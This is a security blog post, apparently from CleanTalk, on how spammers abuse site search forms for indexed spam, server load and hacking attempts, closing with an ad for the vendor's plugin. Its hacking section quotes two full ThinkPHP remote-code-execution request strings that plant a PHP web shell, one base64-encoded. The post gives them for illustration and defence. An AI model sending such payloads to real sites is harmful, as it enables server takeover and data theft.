Everyone knows that in order for the search engine to index the page, some link must lead to this page.
Search and SEO bots check all pages on various sites and if they find a link, then follow it and index new content.
The content posted on the page is created either by the owners, authors and users of the site and this content is checked by the site team. If you think that you control all the content on your site, then you are mistaken.
You can see and moderate comments, user posts, but what if this content is not available to you, but nevertheless it is indexed and this content is spam?
Detect this type of spam is quite difficult, it is not static content on the site. Such spam is distributed through the search form on the site.
How it works
The spammer uses the site search form and enters spam text into the search bar.
Next, your site generates a new page with a unique URL. On this page will be written something like “Unfortunately on your request “Spam text” is no results”.
Now the spammer has a link to a page on your site that already has spammer text. Now he can only pass this link to the search engine and the search engine will index this content.
The danger is that you don’t even know what content was generated on your site.
It is enough for spammers to do a search with the necessary text, suppose that they post a text about your company, how to contact you and leave their email and phone, and post a link to this result. Search engines will index this page and your site will already show spammers’ contacts.
Another point related to the search, the fact is that the page with the search result is not a static page of the site. With each request, the site generates this page, i.e. uses the server’s power, and if there are a lot of such requests? With a large number of requests, the site will work slower and spammers can make a DDoS attack with such requests.
Spammers may not even visit the site or use the search form to get the desired content.
Most CMS have standard search URLs, for WordPress it looks like this www.site.com/?s= OR https://blog.cleantalk.org/?s=firewall
Therefore, it’s enough to take only the list of sites on a specific CMS and generate the necessary links, then transfer these links to the search engine and at the entrance of the search bot on such a link, the CMS will generate the necessary page.
Another dangerous point is an attempt to hack the site through the search form. We have given two examples that were used on our blog.
The request on the site may look like this www.website.local//?s=index/%5C%5Cthink%5C%5Ctemplate%5C%5Cdriver%5C%5Cfile/write&cacheFile=robots.php&content=xbshell1<?php%24password%20=%20%5C”xinba%5C”;%24ch%20=%20explode(%5C”.%5C”,%5C”hello.ass.world.er.t%5C”);array_intersect_ukey(array(%24_REQUEST%5B%24password%5D%20=>%201),%20array(1),%20%24ch%5B1%5D.%24ch%5B3%5D.%24ch%5B4%5D);?>
This is a web application attack, in this case there was an attempt to use the PHP vulnerability for remote code execution.
www.website.local//s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));
That is, it can be used to hack web sites, gain access to the server, execute arbitrary code, SQL injection, steal passwords and user data.
How to protect your site from this type of attack?
The first option is to remove/disable the search on the site. Obviously, this is not the best option, but it will suit someone.
The second option is to add the noindex, nofollow tags to the search results page template. At the same time, spammers will still make requests to your site and your site will fulfill them, but search engines will not index this content. In this case, the danger of hacking the site through the search remains.
The third option is to use the CleanTalk Anti-Spam plugin. CleanTalk automatically embeds the tags prohibiting indexing of results and does not allow to fulfill requests for spam bots.
SpamFireWall blocks the most spam active bots before they reach the page of the site, which means there will be less load on the site. The probability of hacking is reduced, because requests from spam active IP addresses will be blocked, in order to fully protect against this type of attack, you need to use a web application firewall.
Learn more, how CleanTalk can protect your website from spam and malicious activity.